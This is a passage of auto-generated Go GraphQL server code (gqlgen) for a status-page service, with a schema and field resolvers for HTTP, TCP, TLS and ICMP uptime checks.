if e.complexity.TLSCheck.ErrorMsg == nil {
break
}
return e.complexity.TLSCheck.ErrorMsg(childComplexity), true
case "TlsCheck.frecuency":
if e.complexity.TLSCheck.Frecuency == nil {
break
}
return e.complexity.TLSCheck.Frecuency(childComplexity), true
case "TlsCheck.id":
if e.complexity.TLSCheck.ID == nil {
break
}
return e.complexity.TLSCheck.ID(childComplexity), true
case "TlsCheck.identifier":
if e.complexity.TLSCheck.Identifier == nil {
break
}
return e.complexity.TLSCheck.Identifier(childComplexity), true
case "TlsCheck.latestCheck":
if e.complexity.TLSCheck.LatestCheck == nil {
break
}
return e.complexity.TLSCheck.LatestCheck(childComplexity), true
case "TlsCheck.message":
if e.complexity.TLSCheck.Message == nil {
break
}
return e.complexity.TLSCheck.Message(childComplexity), true
case "TlsCheck.status":
if e.complexity.TLSCheck.Status == nil {
break
}
return e.complexity.TLSCheck.Status(childComplexity), true
}
return 0, false
}
func (e *executableSchema) Exec(ctx context.Context) graphql.ResponseHandler {
rc := graphql.GetOperationContext(ctx)
ec := executionContext{rc, e}
first := true
switch rc.Operation.Operation {
case ast.Query:
return func(ctx context.Context) *graphql.Response {
if !first {
return nil
}
first = false
data := ec._Query(ctx, rc.Operation.SelectionSet)
var buf bytes.Buffer
data.MarshalGQL(&buf)
return &graphql.Response{
Data: buf.Bytes(),
}
}
case ast.Mutation:
return func(ctx context.Context) *graphql.Response {
if !first {
return nil
}
first = false
data := ec._Mutation(ctx, rc.Operation.SelectionSet)
var buf bytes.Buffer
data.MarshalGQL(&buf)
return &graphql.Response{
Data: buf.Bytes(),
}
}
default:
return graphql.OneShot(graphql.ErrorResponse(ctx, "unsupported GraphQL operation"))
}
}
type executionContext struct {
*graphql.OperationContext
*executableSchema
}
func (ec *executionContext) introspectSchema() (*introspection.Schema, error) {
if ec.DisableIntrospection {
return nil, errors.New("introspection disabled")
}
return introspection.WrapSchema(parsedSchema), nil
}
func (ec *executionContext) introspectType(name string) (*introspection.Type, error) {
if ec.DisableIntrospection {
return nil, errors.New("introspection disabled")
}
return introspection.WrapTypeFromDef(parsedSchema, parsedSchema.Types[name]), nil
}
var sources = []*ast.Source{
{Name: "schema.graphql", Input: `schema {
query: Query
mutation: Mutation
# subscription: Subscription
}
scalar Time
type CheckExecution {
id : ID!
executionTime: Time!
message: String!
errorMsg: String!
status: String!
}
interface Check {
id: ID!
identifier: String!
frecuency: String!
status: String!
latestCheck: Time
message: String!
errorMsg: String!
}
type HttpCheck implements Check {
id: ID!
identifier: String!
frecuency: String!
url: String!
status: String!
latestCheck: Time
message: String!
errorMsg: String!
}
type TcpCheck implements Check {
id: ID!
identifier: String!
frecuency: String!
address: String!
status: String!
latestCheck: Time
message: String!
errorMsg: String!
}
type TlsCheck implements Check {
id: ID!
identifier: String!
frecuency: String!
address: String!
status: String!
latestCheck: Time
message: String!
errorMsg: String!
}
type IcmpCheck implements Check {
id: ID!
identifier: String!
frecuency: String!
address: String!
status: String!
latestCheck: Time
message: String!
errorMsg: String!
}
input CreateHttpCheckInput {
id: String!
frecuency: String!
url: String!
}
type DeleteResponse {
id: ID!
}
type PollResult {
took: Int!
}
type Mutation {
poll: PollResult
createHttpCheck(input: CreateHttpCheckInput!): Check!
createTcpCheck(input: CreateTcpCheckInput!): Check!
createTlsCheck(input: CreateTlsCheckInput!): Check!
createIcmpCheck(input: CreateIcmpCheckInput!): Check!
deleteCheck(id: ID!): DeleteResponse!
}
input CreateIcmpCheckInput {
id: String!
frecuency: String!
address: String!
}
input CreateTlsCheckInput {
id: String!
frecuency: String!
address: String!
rootCAs:String
}
input CreateTcpCheckInput {
id: String!
frecuency: String!
address: String!
}
type Query {
checks: [Check!]
executions(
checkId: ID!,
from: Time,
until: Time
): [CheckExecution!]
}
`, BuiltIn: false},
}
var parsedSchema = gqlparser.MustLoadSchema(sources...)
// endregion ************************** generated!.gotpl **************************
// region ***************************** args.gotpl *****************************
func (ec *executionContext) field_Mutation_createHttpCheck_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 models.CreateHTTPCheckInput
if tmp, ok := rawArgs["input"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("input"))
arg0, err = ec.unmarshalNCreateHttpCheckInput2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCreateHTTPCheckInput(ctx, tmp)
if err != nil {
return nil, err
}
}
args["input"] = arg0
return args, nil
}
func (ec *executionContext) field_Mutation_createIcmpCheck_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 models.CreateIcmpCheckInput
if tmp, ok := rawArgs["input"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("input"))
arg0, err = ec.unmarshalNCreateIcmpCheckInput2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCreateIcmpCheckInput(ctx, tmp)
if err != nil {
return nil, err
}
}
args["input"] = arg0
return args, nil
}
func (ec *executionContext) field_Mutation_createTcpCheck_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 models.CreateTCPCheckInput
if tmp, ok := rawArgs["input"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("input"))
arg0, err = ec.unmarshalNCreateTcpCheckInput2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCreateTCPCheckInput(ctx, tmp)
if err != nil {
return nil, err
}
}
args["input"] = arg0
return args, nil
}
func (ec *executionContext) field_Mutation_createTlsCheck_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 models.CreateTLSCheckInput
if tmp, ok := rawArgs["input"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("input"))
arg0, err = ec.unmarshalNCreateTlsCheckInput2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCreateTLSCheckInput(ctx, tmp)
if err != nil {
return nil, err
}
}
args["input"] = arg0
return args, nil
}
func (ec *executionContext) field_Mutation_deleteCheck_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 string
if tmp, ok := rawArgs["id"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("id"))
arg0, err = ec.unmarshalNID2string(ctx, tmp)
if err != nil {
return nil, err
}
}
args["id"] = arg0
return args, nil
}
func (ec *executionContext) field_Query___type_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 string
if tmp, ok := rawArgs["name"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("name"))
arg0, err = ec.unmarshalNString2string(ctx, tmp)
if err != nil {
return nil, err
}
}
args["name"] = arg0
return args, nil
}
func (ec *executionContext) field_Query_executions_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 string
if tmp, ok := rawArgs["checkId"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("checkId"))
arg0, err = ec.unmarshalNID2string(ctx, tmp)
if err != nil {
return nil, err
}
}
args["checkId"] = arg0
var arg1 *time.Time
if tmp, ok := rawArgs["from"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("from"))
arg1, err = ec.unmarshalOTime2ᚖtimeᚐTime(ctx, tmp)
if err != nil {
return nil, err
}
}
args["from"] = arg1
var arg2 *time.Time
if tmp, ok := rawArgs["until"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("until"))
arg2, err = ec.unmarshalOTime2ᚖtimeᚐTime(ctx, tmp)
if err != nil {
return nil, err
}
}
args["until"] = arg2
return args, nil
}
func (ec *executionContext) field___Type_enumValues_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 bool
if tmp, ok := rawArgs["includeDeprecated"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("includeDeprecated"))
arg0, err = ec.unmarshalOBoolean2bool(ctx, tmp)
if err != nil {
return nil, err
}
}
args["includeDeprecated"] = arg0
return args, nil
}
func (ec *executionContext) field___Type_fields_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {
var err error
args := map[string]interface{}{}
var arg0 bool
if tmp, ok := rawArgs["includeDeprecated"]; ok {
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("includeDeprecated"))
arg0, err = ec.unmarshalOBoolean2bool(ctx, tmp)
if err != nil {
return nil, err
}
}
args["includeDeprecated"] = arg0
return args, nil
}
// endregion ***************************** args.gotpl *****************************
// region ************************** directives.gotpl **************************
// endregion ************************** directives.gotpl **************************
// region **************************** field.gotpl *****************************
func (ec *executionContext) _CheckExecution_id(ctx context.Context, field graphql.CollectedField, obj *models.CheckExecution) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "CheckExecution",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ID, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNID2string(ctx, field.Selections, res)
}
func (ec *executionContext) _CheckExecution_executionTime(ctx context.Context, field graphql.CollectedField, obj *models.CheckExecution) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "CheckExecution",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ExecutionTime, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(time.Time)
fc.Result = res
return ec.marshalNTime2timeᚐTime(ctx, field.Selections, res)
}
func (ec *executionContext) _CheckExecution_message(ctx context.Context, field graphql.CollectedField, obj *models.CheckExecution) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "CheckExecution",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Message, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _CheckExecution_errorMsg(ctx context.Context, field graphql.CollectedField, obj *models.CheckExecution) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "CheckExecution",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ErrorMsg, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _CheckExecution_status(ctx context.Context, field graphql.CollectedField, obj *models.CheckExecution) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "CheckExecution",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Status, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _DeleteResponse_id(ctx context.Context, field graphql.CollectedField, obj *models.DeleteResponse) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "DeleteResponse",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ID, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNID2string(ctx, field.Selections, res)
}
func (ec *executionContext) _HttpCheck_id(ctx context.Context, field graphql.CollectedField, obj *models.HTTPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "HttpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ID, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNID2string(ctx, field.Selections, res)
}
func (ec *executionContext) _HttpCheck_identifier(ctx context.Context, field graphql.CollectedField, obj *models.HTTPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "HttpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Identifier, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _HttpCheck_frecuency(ctx context.Context, field graphql.CollectedField, obj *models.HTTPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "HttpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Frecuency, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _HttpCheck_url(ctx context.Context, field graphql.CollectedField, obj *models.HTTPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "HttpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.URL, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _HttpCheck_status(ctx context.Context, field graphql.CollectedField, obj *models.HTTPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "HttpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Status, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _HttpCheck_latestCheck(ctx context.Context, field graphql.CollectedField, obj *models.HTTPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "HttpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.LatestCheck, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*time.Time)
fc.Result = res
return ec.marshalOTime2ᚖtimeᚐTime(ctx, field.Selections, res)
}
func (ec *executionContext) _HttpCheck_message(ctx context.Context, field graphql.CollectedField, obj *models.HTTPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "HttpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Message, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _HttpCheck_errorMsg(ctx context.Context, field graphql.CollectedField, obj *models.HTTPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "HttpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ErrorMsg, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _IcmpCheck_id(ctx context.Context, field graphql.CollectedField, obj *models.IcmpCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "IcmpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ID, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNID2string(ctx, field.Selections, res)
}
func (ec *executionContext) _IcmpCheck_identifier(ctx context.Context, field graphql.CollectedField, obj *models.IcmpCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "IcmpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Identifier, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _IcmpCheck_frecuency(ctx context.Context, field graphql.CollectedField, obj *models.IcmpCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "IcmpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Frecuency, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _IcmpCheck_address(ctx context.Context, field graphql.CollectedField, obj *models.IcmpCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "IcmpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Address, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _IcmpCheck_status(ctx context.Context, field graphql.CollectedField, obj *models.IcmpCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "IcmpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Status, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _IcmpCheck_latestCheck(ctx context.Context, field graphql.CollectedField, obj *models.IcmpCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "IcmpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.LatestCheck, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*time.Time)
fc.Result = res
return ec.marshalOTime2ᚖtimeᚐTime(ctx, field.Selections, res)
}
func (ec *executionContext) _IcmpCheck_message(ctx context.Context, field graphql.CollectedField, obj *models.IcmpCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "IcmpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Message, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _IcmpCheck_errorMsg(ctx context.Context, field graphql.CollectedField, obj *models.IcmpCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "IcmpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ErrorMsg, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _Mutation_poll(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Mutation",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: true,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.resolvers.Mutation().Poll(rctx)
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*models.PollResult)
fc.Result = res
return ec.marshalOPollResult2ᚖgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐPollResult(ctx, field.Selections, res)
}
func (ec *executionContext) _Mutation_createHttpCheck(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Mutation",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: true,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field_Mutation_createHttpCheck_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.resolvers.Mutation().CreateHTTPCheck(rctx, args["input"].(models.CreateHTTPCheckInput))
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(models.Check)
fc.Result = res
return ec.marshalNCheck2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheck(ctx, field.Selections, res)
}
func (ec *executionContext) _Mutation_createTcpCheck(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
